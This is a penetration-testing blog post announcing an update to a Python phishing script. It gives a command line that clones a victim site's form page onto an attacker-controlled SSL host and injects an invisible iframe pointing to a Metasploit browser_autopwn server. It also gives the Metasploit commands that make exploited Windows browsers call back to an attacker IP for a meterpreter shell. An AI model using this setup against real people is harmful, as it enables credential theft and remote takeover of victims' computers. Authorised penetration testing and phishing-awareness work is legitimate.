Adventures in Penetration Testing: Let’s Go Phishing – Update
Please see the original article for more information about this phishing script. This is just a minor update to some functionality that I added over the weekend. I haven’t hooked BeEF in yet, but I have added Metasploit, which can be nice.
The updated version, which can be found here, can be tied into Metasploit’s browser_autopwn module. For more information about the module, see a good little write up here.
I’ve added an option that will add an invisible iframe to the bottom of whatever page you are phishing that points to whatever IP or FQDN on which you want to run the browser_autopwn module.
Example:
python gophish.py --phish https://<victimsite>/path/to/form/page --replace https://<phishinghost> --port 443 --ssl \ --sslcert ssl.crt --sslkey ssl.key --sslchain chain.crt \ --autopwn http://<MetasploitAutopwnHost>/<autopwnuri>
The setup on the Metasploit host would be:
use auxiliary/server/browser_autopwn set SRVHOST <AttackerIP> set SRVPORT 80 set URIPATH / set LPORT_WIN32 443 run
This will start up the listener on port 80, running on whatever IP you set as <AttackerIP>, with a URI of ‘/’, and any successful Windows exploits will call back to your <AttackerIP> on port 443 to establish a meterpreter session.
Search Posts
Security Categories
- Android
- Apache Security
- Burp
- CodeWatch
- Deadrop
- Java
- Linux
- Metasploit
- OWASP 2010 A1
- OWASP 2010 A10
- OWASP 2010 A2
- OWASP 2010 A3
- OWASP 2010 A4
- OWASP 2010 A5
- OWASP 2010 A6
- OWASP 2010 A7
- OWASP 2010 A9
- OWASP 2013 A9
- Penetration Testing
- Phishing
- PHP Security
- PowerShell
- Python
- Social Engineering
- Unix
- Windows
Top Tags
ASVS 3.1 ASVS 3.2 ASVS 3.3 ASVS 3.4 ASVS 3.5 ASVS 3.6 ASVS 3.7 ASVS 3.8 ASVS 3.9 ASVS 3.10 ASVS 3.11 ASVS 3.12 ASVS 3.13 ASVS 11.4 bcrypt Burp Suite Pro CodeWatch CryptoPP Hashcat Hyperion Java Linux Metasploit Meterpreter mimikatz msfencode msfpayload Ophcrack OWASP 2010 A1 - Injection OWASP 2010 A2 - Cross-Site Scripting (XSS) OWASP 2010 A3 - Broken Authentication and Session Management Penetration Testing Phishing PHP Powershell Python SET Shellcodeexec Social Engineering Unix Veil VirusTotal WAF Web App Pentesting Windows